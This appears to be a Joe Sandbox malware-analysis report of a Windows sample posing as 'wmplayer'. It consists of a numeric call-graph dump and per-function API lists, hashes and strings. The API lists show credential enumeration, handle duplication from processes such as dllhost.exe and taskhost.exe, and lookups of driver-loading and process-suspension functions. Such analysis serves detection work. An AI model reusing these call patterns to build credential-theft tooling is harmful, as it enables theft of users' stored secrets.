40053->39968 40054->39890 40055->39898 40056->39902 40057->39903 40058->39903 40059->39912 40060->39916 40061->39920 40062->39927 40063->39934 40064->39938 40065->39946 40066->39961 40067->39967 40068->39986 40069->39986 40070->39986 40071->39982 40072->39989 40073->39994 40074->39965 40075->39965 40076->39965 40077->39966 40078->39973 40079->39975 40080->39978 40081->39983 40082->39987 40083->39991 40084->39995 40085->40001 40086->40002 40087->40001 40088->40005 40089->40007 40090->40009 40091->40011 40092->40013 40093->40015 40094->40017 40095->40019 40096->40021 40097->40023 40098->40025 40099->39968 40100->39933 40101->39926 40102->39931 40103->39936 40104->39945 40105->39952 40106->39924 40107->39925 40108->39932 40109->39937 40110->39944 40111->39947 40112->39954 40113->39952 40114->39957 40115->39959 40116->39968 40117->39911 40118->39856 40120 42a175 40119->40120 40122 42a122 40119->40122 40120->40032 40125 42b13b 147 API calls 40120->40125 40122->40120 40123 42a115 147 API calls 40122->40123 40126 43a174 40122->40126 40150 42a0a8 147 API calls 40122->40150 40123->40122 40125->40036 40140 43a196 40126->40140 40141 43a19e 40126->40141 40127 43a306 40127->40140 40170 4388c4 14 API calls 40127->40170 40130 42a115 147 API calls 40130->40141 40132 43a642 40132->40140 40174 4169a7 11 API calls 40132->40174 40136 43a635 40173 42c02e memset 40136->40173 40140->40122 40141->40127 40141->40130 40141->40140 40151 42ff8c 40141->40151 40159 415a91 40141->40159 40163 4165ff 40141->40163 40166 439504 13 API calls 40141->40166 40167 4312d0 147 API calls 40141->40167 40168 42be4c memcpy memcpy memcpy memset memcpy 40141->40168 40169 43a121 11 API calls 40141->40169 40143 4169a7 11 API calls 40144 43a325 40143->40144 40144->40132 40144->40136 40144->40140 40144->40143 40145 42b5b5 memset memcpy 40144->40145 40146 42bf4c 14 API calls 40144->40146 40149 4165ff 11 API calls 40144->40149 40171 42b63e 14 API calls 40144->40171 40172 42bfcf memcpy 40144->40172 40145->40144 40146->40144 40149->40144 40150->40122 40175 43817e 40151->40175 40153 42ff99 40154 42ffe3 40153->40154 40155 42ffd0 40153->40155 40158 42ff9d 40153->40158 40180 4169a7 11 API calls 40154->40180 40179 4169a7 11 API calls 40155->40179 40158->40141 40160 415a9d 40159->40160 40161 415ab3 40160->40161 40162 415aa4 memset 40160->40162 40161->40141 40162->40161 40329 4165a0 40163->40329 40166->40141 40167->40141 40168->40141 40169->40141 40170->40144 40171->40144 40172->40144 40173->40132 40174->40140 40176 438187 40175->40176 40178 438192 40175->40178 40181 4380f6 40176->40181 40178->40153 40179->40158 40180->40158 40183 43811f 40181->40183 40182 438164 40182->40178 40183->40182 40186 437e5e 40183->40186 40209 4300e8 memset memset memcpy 40183->40209 40210 437d3c 40186->40210 40188 437eb3 40188->40183 40189 437ea9 40189->40188 40194 437f22 40189->40194 40225 41f432 40189->40225 40192 437f06 40272 415c56 11 API calls 40192->40272 40196 432d4e 3 API calls 40194->40196 40197 437f7f 40194->40197 40195 437f95 40273 415c56 11 API calls 40195->40273 40196->40197 40197->40195 40198 43802b 40197->40198 40200 4165ff 11 API calls 40198->40200 40201 438054 40200->40201 40236 437371 40201->40236 40204 43806b 40205 438094 40204->40205 40274 42f50e 138 API calls 40204->40274 40207 437fa3 40205->40207 40275 4300e8 memset memset memcpy 40205->40275 40207->40188 40276 41f638 104 API calls 40207->40276 40209->40183 40211 437d69 40210->40211 40214 437d80 40210->40214 40277 437ccb 11 API calls 40211->40277 40213 437d76 40213->40189 40214->40213 40215 437da3 40214->40215 40217 437d90 40214->40217 40218 438460 134 API calls 40215->40218 40217->40213 40281 437ccb 11 API calls 40217->40281 40221 437dcb 40218->40221 40219 437de8 40280 424f26 123 API calls 40219->40280 40221->40219 40278 444283 13 API calls 40221->40278 40223 437dfc 40279 437ccb 11 API calls 40223->40279 40226 41f54d 40225->40226 40232 41f44f 40225->40232 40227 41f466 40226->40227 40311 41c635 memset memset 40226->40311 40227->40192 40227->40194 40232->40227 40234 41f50b 40232->40234 40282 41f1a5 40232->40282 40307 41c06f memcmp 40232->40307 40308 41f3b1 90 API calls 40232->40308 40309 41f398 86 API calls 40232->40309 40234->40226 40234->40227 40310 41c295 86 API calls 40234->40310 40312 41703f 40236->40312 40238 437399 40239 43739d 40238->40239 40241 4373ac 40238->40241 40319 4446ea 11 API calls 40239->40319 40242 416935 16 API calls 40241->40242 40243 4373ca 40242->40243 40244 438460 134 API calls 40243->40244 40249 4251c4 137 API calls 40243->40249 40253 415a91 memset 40243->40253 40256 43758f 40243->40256 40268 437584 40243->40268 40271 437d3c 135 API calls 40243->40271 40320 425433 13 API calls 40243->40320 40321 425413 17 API calls 40243->40321 40322 42533e 16 API calls 40243->40322 40323 42538f 16 API calls 40243->40323 40324 42453e 123 API calls 40243->40324 40244->40243 40245 4375bc 40247 415c7d 16 API calls 40245->40247 40248 4375d2 40247->40248 40250 4442e6 11 API calls 40248->40250 40270 4373a7 40248->40270 40249->40243 40251 4375e2 40250->40251 40251->40270 40327 444283 13 API calls 40251->40327 40253->40243 40325 42453e 123 API calls 40256->40325 40259 4375f4 40262 437620 40259->40262 40263 43760b 40259->40263 40261 43759f 40264 416935 16 API calls 40261->40264 40266 416935 16 API calls 40262->40266 40328 444283 13 API calls 40263->40328 40264->40268 40266->40270 40268->40245 40326 42453e 123 API calls 40268->40326 40269 437612 memcpy 40269->40270 40270->40204 40271->40243 40272->40188 40273->40207 40274->40205 40275->40207 40276->40188 40277->40213 40278->40223 40279->40219 40280->40213 40281->40213 40283 41bc3b 101 API calls 40282->40283 40284 41f1b4 40283->40284 40285 41edad 86 API calls 40284->40285 40292 41f282 40284->40292 40286 41f1cb 40285->40286 40287 41f1f5 memcmp 40286->40287 40288 41f20e 40286->40288 40286->40292 40287->40288 40289 41f21b memcmp 40288->40289 40288->40292 40290 41f326 40289->40290 40293 41f23d 40289->40293 40291 41ee6b 86 API calls 40290->40291 40290->40292 40291->40292 40292->40232 40293->40290 40294 41f28e memcmp 40293->40294 40296 41c8df 56 API calls 40293->40296 40294->40290 40295 41f2a9 40294->40295 40295->40290 40298 41f308 40295->40298 40299 41f2d8 40295->40299 40297 41f269 40296->40297 40297->40290 40300 41f287 40297->40300 40301 41f27a 40297->40301 40298->40290 40305 4446ce 11 API calls 40298->40305 40302 41ee6b 86 API calls 40299->40302 40300->40294 40303 41ee6b 86 API calls 40301->40303 40304 41f2e0 40302->40304 40303->40292 40306 41b1ca memset 40304->40306 40305->40290 40306->40292 40307->40232 40308->40232 40309->40232 40310->40226 40311->40227 40313 417044 40312->40313 40314 41705c 40312->40314 40316 416760 11 API calls 40313->40316 40318 417055 40313->40318 40315 417075 40314->40315 40317 41707a 11 API calls 40314->40317 40315->40238 40316->40318 40317->40313 40318->40238 40319->40270 40320->40243 40321->40243 40322->40243 40323->40243 40324->40243 40325->40261 40326->40245 40327->40259 40328->40269 40334 415cfe 40329->40334 40338 415d23 __aullrem __aulldvrm 40334->40338 40341 41628e 40334->40341 40335 4163ca 40348 416422 11 API calls 40335->40348 40337 416172 memset 40337->40338 40338->40335 40338->40337 40339 416422 10 API calls 40338->40339 40340 415cb9 10 API calls 40338->40340 40338->40341 40339->40338 40340->40338 40342 416520 40341->40342 40343 416527 40342->40343 40347 416574 40342->40347 40344 416544 40343->40344 40343->40347 40349 4156aa 11 API calls 40343->40349 40346 416561 memcpy 40344->40346 40344->40347 40346->40347 40347->40141 40348->40341 40349->40344 40381 41493c EnumResourceNamesW 37676 4287c1 37677 4287d2 37676->37677 37678 429ac1 37676->37678 37679 428818 37677->37679 37680 42881f 37677->37680 37695 425711 37677->37695 37690 425ad6 37678->37690 37746 415c56 11 API calls 37678->37746 37713 42013a 37679->37713 37741 420244 97 API calls 37680->37741 37685 4260dd 37740 424251 120 API calls 37685->37740 37687 4259da 37739 416760 11 API calls 37687->37739 37693 422aeb memset memcpy memcpy 37693->37695 37694 429a4d 37696 429a66 37694->37696 37700 429a9b 37694->37700 37695->37678 37695->37687 37695->37693 37695->37694 37698 4260a1 37695->37698 37709 4259c2 37695->37709 37712 425a38 37695->37712 37729 4227f0 memset memcpy 37695->37729 37730 422b84 15 API calls 37695->37730 37731 422b5d memset memcpy memcpy 37695->37731 37732 422640 13 API calls 37695->37732 37734 4241fc 11 API calls 37695->37734 37735 42413a 90 API calls 37695->37735 37742 415c56 11 API calls 37696->37742 37738 415c56 11 API calls 37698->37738 37701 429a96 37700->37701 37744 416760 11 API calls 37700->37744 37745 424251 120 API calls 37701->37745 37703 429a7a 37743 416760 11 API calls 37703->37743 37709->37690 37733 415c56 11 API calls 37709->37733 37712->37709 37736 422640 13 API calls 37712->37736 37737 4226e0 12 API calls 37712->37737 37714 42014c 37713->37714 37717 420151 37713->37717 37756 41e466 97 API calls 37714->37756 37716 420162 37716->37695 37717->37716 37718 4201b3 37717->37718 37719 420229 37717->37719 37720 4201b8 37718->37720 37721 4201dc 37718->37721 37719->37716 37722 41fd5e 86 API calls 37719->37722 37747 41fbdb 37720->37747 37721->37716 37725 4201ff 37721->37725 37753 41fc4c 37721->37753 37722->37716 37725->37716 37728 42013a 97 API calls 37725->37728 37728->37716 37729->37695 37730->37695 37731->37695 37732->37695 37733->37687 37734->37695 37735->37695 37736->37712 37737->37712 37738->37687 37739->37685 37740->37690 37741->37695 37742->37703 37743->37701 37744->37701 37745->37678 37746->37687 37748 41fbf1 37747->37748 37749 41fbf8 37747->37749 37752 41fc39 37748->37752 37771 4446ce 11 API calls 37748->37771 37761 41ee26 37749->37761 37752->37716 37757 41fd5e 37752->37757 37754 41ee6b 86 API calls 37753->37754 37755 41fc5d 37754->37755 37755->37721 37756->37717 37759 41fd65 37757->37759 37758 41fdab 37758->37716 37759->37758 37760 41fbdb 86 API calls 37759->37760 37760->37759 37762 41ee41 37761->37762 37763 41ee32 37761->37763 37772 41edad 37762->37772 37775 4446ce 11 API calls 37763->37775 37766 41ee3c 37766->37748 37769 41ee58 37769->37766 37777 41ee6b 37769->37777 37771->37752 37781 41be52 37772->37781 37775->37766 37776 41eb85 11 API calls 37776->37769 37778 41ee70 37777->37778 37779 41ee78 37777->37779 37834 41bf99 86 API calls 37778->37834 37779->37766 37782 41be6f 37781->37782 37783 41be5f 37781->37783 37789 41be8c 37782->37789 37813 418c63 memset memset 37782->37813 37812 4446ce 11 API calls 37783->37812 37785 41be69 37785->37766 37785->37776 37787 41bee7 37787->37785 37817 41a453 86 API calls 37787->37817 37789->37785 37789->37787 37790 41bf3a 37789->37790 37791 41bed1 37789->37791 37816 4446ce 11 API calls 37790->37816 37793 41bef0 37791->37793 37796 41bee2 37791->37796 37793->37787 37795 41bf01 37793->37795 37794 41bf24 memset 37794->37785 37795->37794 37797 41bf14 37795->37797 37814 418a6d memset memcpy memset 37795->37814 37802 41ac13 37796->37802 37815 41a223 memset memcpy memset 37797->37815 37801 41bf20 37801->37794 37803 41ac3f memset 37802->37803 37805 41ac52 37802->37805 37804 41acd9 37803->37804 37804->37787 37807 41ac6a 37805->37807 37818 41dc14 19 API calls 37805->37818 37808 41aca1 37807->37808 37819 41519d 37807->37819 37808->37804 37810 41acc0 memset 37808->37810 37811 41accd memcpy 37808->37811 37810->37804 37811->37804 37812->37785 37813->37789 37814->37797 37815->37801 37816->37787 37818->37807 37822 4175ed 37819->37822 37830 417570 SetFilePointer 37822->37830 37825 41760a ReadFile 37826 417637 37825->37826 37827 417627 GetLastError 37825->37827 37828 4151b3 37826->37828 37829 41763e memset 37826->37829 37827->37828 37828->37808 37829->37828 37831 4175b2 37830->37831 37832 41759c GetLastError 37830->37832 37831->37825 37831->37828 37832->37831 37833 4175a8 GetLastError 37832->37833 37833->37831 37834->37779 37835 417bc5 37836 417c61 37835->37836 37841 417bda 37835->37841 37837 417bf6 UnmapViewOfFile CloseHandle 37837->37837 37837->37841 37839 417c2c 37839->37841 37847 41851e 20 API calls 37839->37847 37841->37836 37841->37837 37841->37839 37842 4175b7 37841->37842 37843 4175d6 CloseHandle 37842->37843 37844 4175c8 37843->37844 37845 4175df 37843->37845 37844->37845 37846 4175ce Sleep 37844->37846 37845->37841 37846->37843 37847->37839 39821 4147f3 39824 414561 39821->39824 39823 414813 39825 41456d 39824->39825 39826 41457f GetPrivateProfileIntW 39824->39826 39829 4143f1 memset _itow WritePrivateProfileStringW 39825->39829 39826->39823 39828 41457a 39828->39823 39829->39828

                                                                                            Executed Functions

                                                                                            Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                            • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                            • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                            • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                            • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                            • memset.MSVCRT ref: 0040DF5F
                                                                                            • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                            • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                            • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                            • API String ID: 708747863-3398334509
                                                                                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                            Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                              • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                            • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                            • free.MSVCRT ref: 00418803
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                            • String ID:
                                                                                            • API String ID: 1355100292-0
                                                                                            • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                            • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                            Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                            • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$FirstNext
                                                                                            • String ID:
                                                                                            • API String ID: 1690352074-0
                                                                                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                            Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0041898C
                                                                                            • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystemmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3558857096-0
                                                                                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                            Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 38 44558e-445594 call 444b06 4->38 39 44557e-44558c call 4136c0 call 41366b 4->39 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 42 445823-445826 14->42 15->16 22 445672-445683 call 40a889 call 403fbe 16->22 23 4455fb-445601 16->23 49 445879-44587c 18->49 24 44594f-445958 19->24 25 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->25 82 445685 22->82 83 4456b2-4456b5 call 40b1ab 22->83 34 445605-445607 23->34 35 445603 23->35 32 4459f2-4459fa 24->32 33 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 24->33 134 44592d-445945 call 40b6ef 25->134 135 44594a 25->135 44 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 32->44 45 445b29-445b32 32->45 153 4459d0-4459e8 call 40b6ef 33->153 154 4459ed 33->154 34->22 41 445609-44560d 34->41 35->34 38->3 39->38 41->22 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 51 44584c-445854 call 40b1ab 42->51 52 445828 42->52 182 445b08-445b15 call 40ae51 44->182 53 445c7c-445c85 45->53 54 445b38-445b96 memset * 3 45->54 63 4458a2-4458aa call 40b1ab 49->63 64 44587e 49->64 150 445665-445670 call 40b1ab 50->150 151 445643-445663 call 40a9b5 call 4087b3 50->151 51->13 66 44582e-445847 call 40a9b5 call 4087b3 52->66 60 445d1c-445d25 53->60 61 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->61 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->67 68 445b98-445ba0 54->68 87 445fae-445fb2 60->87 88 445d2b-445d3b 60->88 168 445cf5 61->168 169 445cfc-445d03 61->169 63->19 80 445884-44589d call 40a9b5 call 4087b3 64->80 137 445849 66->137 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 156 44589f 80->156 81->53 99 44568b-4456a4 call 40a9b5 call 4087b3 82->99 115 4456ba-4456c4 83->115 89 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->89 90 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->90 162 445d67-445d6c 89->162 163 445d71-445d83 call 445093 89->163 196 445e17 90->196 197 445e1e-445e25 90->197 158 4456a9-4456b0 99->158 129 4457f9 115->129 130 4456ca-4456d3 call 413cfa call 413d4c 115->130 129->6 172 4456d8-4456f7 call 40b2cc call 413fa6 130->172 134->135 135->24 137->51 150->115 151->150 153->154 154->32 156->63 158->83 158->99 174 445fa1-445fa9 call 40b6ef 162->174 163->87 168->169 179 445d05-445d13 169->179 180 445d17 169->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->60 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->45 201->182 219 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->219 242 445e62-445e69 202->242 243 445e5b 202->243 218 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->218 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->87 255 445f9b 218->255 219->182 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->53 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->218 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004455C2
                                                                                            • wcsrchr.MSVCRT ref: 004455DA
                                                                                            • memset.MSVCRT ref: 0044570D
                                                                                            • memset.MSVCRT ref: 00445725
                                                                                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                              • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                              • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                              • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                              • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                            • memset.MSVCRT ref: 0044573D
                                                                                            • memset.MSVCRT ref: 00445755
                                                                                            • memset.MSVCRT ref: 004458CB
                                                                                            • memset.MSVCRT ref: 004458E3
                                                                                            • memset.MSVCRT ref: 0044596E
                                                                                            • memset.MSVCRT ref: 00445A10
                                                                                            • memset.MSVCRT ref: 00445A28
                                                                                            • memset.MSVCRT ref: 00445AC6
                                                                                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            • memset.MSVCRT ref: 00445B52
                                                                                            • memset.MSVCRT ref: 00445B6A
                                                                                            • memset.MSVCRT ref: 00445C9B
                                                                                            • memset.MSVCRT ref: 00445CB3
                                                                                            • _wcsicmp.MSVCRT ref: 00445D56
                                                                                            • memset.MSVCRT ref: 00445B82
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                              • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                              • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
